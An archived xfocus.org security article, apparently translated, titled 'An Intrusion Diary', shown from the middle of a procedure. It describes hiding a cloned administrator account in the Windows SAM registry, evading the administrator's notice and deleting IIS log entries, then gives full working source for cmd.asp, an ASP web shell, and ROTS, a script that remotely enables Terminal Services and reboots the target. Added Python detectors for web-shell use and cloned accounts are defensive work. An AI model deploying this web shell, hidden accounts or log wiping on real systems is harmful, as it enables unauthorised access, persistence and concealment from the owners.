入侵日记一则.html (An Intrusion Diary)

This collection consists of articles published on www.xfocus.org.
Run regedit.exe and import the 3f1.reg file we modified earlier.

Finally, open regedt32.exe, go to HKEY_LOCAL_MACHINE\SAM\SAM, select it, and under the menu "Security" -> "Permissions" remove the user that was added there earlier. (In the example guest was used, and the settings of the Administrators group were changed as well, so, to match the earlier steps, the Administrators group must be changed back too, and the keys below SAM, that is Domains, Account and Users, must each be handled the same way, level by level. If the guest user's default group was not changed earlier, there is no need for this level-by-level effort.)

This leaves us with an account, InternetUser$, that shows up neither in `net user` at the console (net user omits names ending in "$") nor in "Computer Management". Its password cannot be changed, though: as soon as it is, the account appears in "Computer Management". One further thing to note: after every logon (with the cloned account or not) it is best to log off rather than simply close the window; otherwise the session is visible in "Terminal Services Manager", and when the administrator logs off after logging on they may notice something odd: why does it say "Logging off InternetUser$..."!!! (I cloned two accounts for testing; I did not test Administrators.)

Then comes cleaning up the logs: the downloads made during the whole process were logged, so go into the LogFiles directory (IIS keeps its logs under %SystemRoot%\system32\LogFiles) and delete the relevant entries from the files concerned.

My skills are poor, so there are bound to be errors and omissions; this article has been revised N times, so I hope the experts will criticise and correct it.
<br />
<br />
Appendix:
--------------------------------------------------
The following is the ASP backdoor; save it as cmd.asp.
<%@ Language=VBScript %>
<%

   Dim oScript
   Dim oScriptNet
   Dim oFileSys, oFile
   Dim szCMD, szTempFile

   On Error Resume Next

   ' -- create the COM objects that we will be using -- '
   Set oScript = Server.CreateObject("WSCRIPT.SHELL")
   Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
   Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

   ' -- check for a command that we have posted -- '
   szCMD = Request.Form(".CMD")
   If (szCMD <> "") Then

     ' -- Use a poor man's pipe ... a temp file -- '
     szTempFile = "C:\" & oFileSys.GetTempName( )
     Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
     Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

   End If

%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>

<%
   If (IsObject(oFile)) Then
     ' -- Read the output from our command and remove the temp file -- '
     On Error Resume Next
     Response.Write Server.HTMLEncode(oFile.ReadAll)
     oFile.Close
     Call oFileSys.DeleteFile(szTempFile, True)
   End If
%>
</PRE>
</BODY>
</HTML>
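The defender's view of the two artefacts above, cmd.asp and the entries in the IIS LogFiles directory that the diary deletes: this is an added example, not code from the diary or from the author of cmd.asp. It parses W3C extended log lines (a constructed excerpt is embedded below; the field list is assumed to be the IIS 5 default) and flags a client that repeatedly POSTs to an .asp page nobody else ever posts to, which is what driving a form-based shell like cmd.asp looks like in the log. Since the diary's cleanup step edits these very files on the host, the check is only worth anything on a copy shipped off the server before the attacker gets to it.

```python
# Added example: flag interactive use of a form-based ASP shell such as cmd.asp in an
# IIS W3C extended log. Not from the diary; the field list is assumed to be the IIS 5 default.
from collections import defaultdict
from datetime import datetime

# Constructed log excerpt (not a real capture). IIS replaces spaces inside fields with '+',
# so whitespace splitting is safe.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-05-10 02:11:03
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-05-10 02:11:03 10.0.0.5 - 192.168.1.20 80 GET /default.asp - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-05-10 02:11:40 10.0.0.5 - 192.168.1.20 80 GET /cmd.asp - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-05-10 02:11:52 10.0.0.5 - 192.168.1.20 80 POST /cmd.asp - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-05-10 02:12:30 10.0.0.5 - 192.168.1.20 80 POST /cmd.asp - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-05-10 02:12:58 10.0.0.5 - 192.168.1.20 80 POST /cmd.asp - 200 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-05-10 02:15:10 10.0.0.9 - 192.168.1.20 80 POST /guestbook/post.asp - 302 Mozilla/4.0+(compatible;+MSIE+6.0)
2003-05-10 02:16:44 10.0.0.12 - 192.168.1.20 80 POST /guestbook/post.asp - 302 Mozilla/4.0+(compatible;+MSIE+6.0)
"""


def parse_w3c(text):
    """Turn W3C extended log lines into dicts keyed by the names in the #Fields directive,
    adding a parsed 'ts' datetime. Directive lines and malformed rows are skipped."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue
        row = dict(zip(fields, parts))
        row["ts"] = datetime.strptime(row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
        rows.append(row)
    return rows


def webshell_candidates(rows, min_posts=3, window_seconds=300):
    """Return (client, uri, post_count) for every .asp page that only one client ever POSTs to
    and that this client POSTs to at least min_posts times within window_seconds: the shape of
    someone typing commands into cmd.asp's form, as opposed to a public form handler."""
    posts = defaultdict(list)     # (client, uri) -> timestamps of POSTs
    posters = defaultdict(set)    # uri -> clients that POST to it
    for r in rows:
        if r["cs-method"] != "POST" or not r["cs-uri-stem"].lower().endswith(".asp"):
            continue
        posts[(r["c-ip"], r["cs-uri-stem"])].append(r["ts"])
        posters[r["cs-uri-stem"]].add(r["c-ip"])
    hits = []
    for (client, uri), times in posts.items():
        if len(posters[uri]) != 1:
            continue                          # several clients post here: an ordinary form
        times.sort()
        for i in range(len(times) - min_posts + 1):
            if (times[i + min_posts - 1] - times[i]).total_seconds() <= window_seconds:
                hits.append((client, uri, len(times)))
                break
    return hits


if __name__ == "__main__":
    for client, uri, n in webshell_candidates(parse_w3c(SAMPLE_LOG)):
        print(f"{client} drove {uri} with {n} POSTs: candidate web shell")
```

The thresholds are deliberately loose; the point is the two-part shape (a single poster, a burst of POSTs), not the exact numbers, and a real deployment would also whitelist known form handlers.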
<br />
----------------------------------------------------------------------<br />
The following is the script that opens the terminal service, quoted from caozhe (草哲)'s <<一次简单的3389入侵过程>> (A Simple 3389 Intrusion); save it as rots.vbe.
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
' relaunch under cscript so that the console reads/writes below work
if (lcase(right(wscript.fullname,11))="wscript.exe") then
   set objShell=wscript.createObject("wscript.shell")
   objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
   wscript.quit
end if
if wscript.arguments.count<3 then
   usage()
   wscript.echo "Not enough parameters."
   wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
   port=wscript.arguments(3)
else
   port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
   wscript.echo "The number of port is error."
   wscript.quit
end if
if wscript.arguments.count>4 then
   reboot=wscript.arguments(4)
else
   reboot=""
end if

usage()
outstreem.write "Connecting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
' 23 = wbemPrivilegeRemoteShutdown, 18 = wbemPrivilegeShutdown: needed for Win32Shutdown below
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
   if instr(objinstoscaption.caption,"Server")>0 then
      wscript.echo "OK!"
   else
      wscript.echo "OS type is "&objinstoscaption.caption
      outstreem.write "Do you want to cancel setup?[y/n]"
      strcancel=instreem.readline
      if lcase(strcancel)<>"n" then wscript.quit
   end if
next

outstreem.write "Writing into registry ...."
' remote registry access goes through the StdRegProv WMI class in root/default
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
' Offline Files off, Windows Installer allowed in remote-admin TS sessions
.createkey HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
' Terminal Services on; TermDD and TermService set to automatic start (2)
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
' listening port of the RDP-Tcp listener (default 3389)
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

' Win32Shutdown flags: 2 = reboot, 6 = forced reboot
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
   outstreem.write "Now, reboot target...."
   strwqlquery="select * from win32_operatingsystem where primary='true'"
   set colinstances=objswbemservices.execquery(strwqlquery)
   for each objinstance in colinstances
      objinstance.win32shutdown(flag)
   next
   showerror(err.number)
else
   wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

function showerror(errornumber)
if errornumber Then
   wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
   if err.description <> "" then
      wscript.echo "Error description: "&err.description&"."
   end if
   wscript.quit
else
   wscript.echo "OK!"
end if
end function

function usage()
wscript.echo string(79,"*")
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Terminal services Script, by 草哲"
wscript.echo "Welcome to visit www.5458.net"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: default number is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: auto force reboot target."
wscript.echo string(79,"*")&vbcrlf
end function
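An added check covering both the 3f1.reg account-cloning step at the top of this page and the registry values ROTS writes; it is example code, not part of the diary or of ROTS. It parses a regedit export (a constructed one is embedded, assumed to come from `regedit /e` run as SYSTEM so that the SAM hive is included) and (a) flags any user key under SAM\SAM\Domains\Account\Users whose F value carries a different RID than the key name, which is exactly what importing Administrator's F value into 000003F1 produces, and (b) lists the Terminal Services values found in the state ROTS leaves behind. The RID offset 0x30 inside the F value is the NT/2000 SAM layout and an assumption of this example; the diary does not state it.

```python
# Added example: audit a regedit .reg export for a cloned SAM account (the 3f1.reg step)
# and for the Terminal Services values that ROTS writes. Not from the diary or from ROTS.
import re

def _f_value(rid):
    """Constructed 64-byte SAM user F value in regedit hex syntax, RID at offset 0x30."""
    body = bytes(0x30) + rid.to_bytes(4, "little") + bytes(12)
    hexed = [f"{b:02x}" for b in body]
    return "hex:" + ",\\\n  ".join(",".join(hexed[i:i + 16]) for i in range(0, 64, 16))

# Constructed export standing in for a dump of a compromised host (not from the page):
# 000001F4 is Administrator, 000003F1 the InternetUser$ clone carrying Administrator's F.
SAMPLE_REG = rf"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"={_f_value(0x1F4)}

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]
"F"={_f_value(0x1F4)}

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
"Enabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"TSEnabled"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00001f90
"""

def parse_reg(text):
    """Parse the .reg subset used here: [key] headers, "name"=dword:, and "name"=hex...:
    byte lists, which regedit continues on following lines ending in a backslash."""
    keys, current, pending = {}, None, None      # pending = (value name, hex text so far)
    for raw in text.splitlines():
        line = raw.strip()
        if pending:
            pending = (pending[0], pending[1] + line.rstrip("\\"))
            if not line.endswith("\\"):
                keys[current][pending[0]] = bytes.fromhex(pending[1].replace(",", ""))
                pending = None
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = re.fullmatch(r'"([^"]+)"=(.*)', line)
        if not m or current is None:
            continue
        name, data = m.groups()
        if data.startswith("dword:"):
            keys[current][name] = int(data[6:], 16)
        elif data.startswith("hex"):
            body = data.split(":", 1)[1]
            if body.endswith("\\"):
                pending = (name, body.rstrip("\\"))
            else:
                keys[current][name] = bytes.fromhex(body.replace(",", ""))
    return keys

USERS_PREFIX = "HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\"
RID_OFFSET = 0x30   # RID field of the F value (NT/2000 SAM layout; an assumption of this example)

def find_cloned_accounts(keys):
    """Return (rid_of_key, rid_inside_F) for every user key whose F value names another RID."""
    clones = []
    for path, values in keys.items():
        leaf = path[len(USERS_PREFIX):]
        if not path.upper().startswith(USERS_PREFIX.upper()) or not re.fullmatch(r"[0-9A-Fa-f]{8}", leaf):
            continue
        f = values.get("F")
        if isinstance(f, bytes) and len(f) >= RID_OFFSET + 4:
            f_rid = int.from_bytes(f[RID_OFFSET:RID_OFFSET + 4], "little")
            if f_rid != int(leaf, 16):
                clones.append((int(leaf, 16), f_rid))
    return clones

TS = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"
SVC = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService"
NETCACHE = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\netcache"

def rots_footprint(keys):
    """List which of the values ROTS writes are present with ROTS's settings."""
    def get(key, name):
        return keys.get(key, {}).get(name)
    findings = []
    if get(TS, "TSEnabled") == 1:
        findings.append("TSEnabled=1: Terminal Services switched on")
    if get(SVC, "Start") == 2:
        findings.append("TermService Start=2: service set to automatic start")
    port = get(TS + "\\WinStations\\RDP-Tcp", "PortNumber")
    if port not in (None, 3389):
        findings.append(f"RDP-Tcp PortNumber moved from 3389 to {port}")
    if get(NETCACHE, "Enabled") == 0:
        findings.append("netcache Enabled=0: Offline Files disabled, as ROTS does before enabling TS")
    return findings

if __name__ == "__main__":
    reg = parse_reg(SAMPLE_REG)
    for key_rid, f_rid in find_cloned_accounts(reg):
        print(f"user key {key_rid:08X} carries RID {f_rid} in its F value: cloned account")
    for finding in rots_footprint(reg):
        print("ROTS footprint:", finding)
```

The clone check is the one that matters: the diary's permission changes hide InternetUser$ from the management tools, but they cannot change the fact that its F value names RID 500, and that mismatch survives every cosmetic trick the text describes.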
<br />
<br />
<span style='color:red'>root's note: for beginners in network security this article may be of some help; although the methods used are fairly simple, it helps in understanding how an attacker thinks and the flow of the methods used. Of course, this is not to encourage anyone to actually do this :)</span>	</td>  </tr></table><div class="footer">  Copyright &copy; 1998-2003 XFOCUS Team. All Rights Reserved</div></body></html>
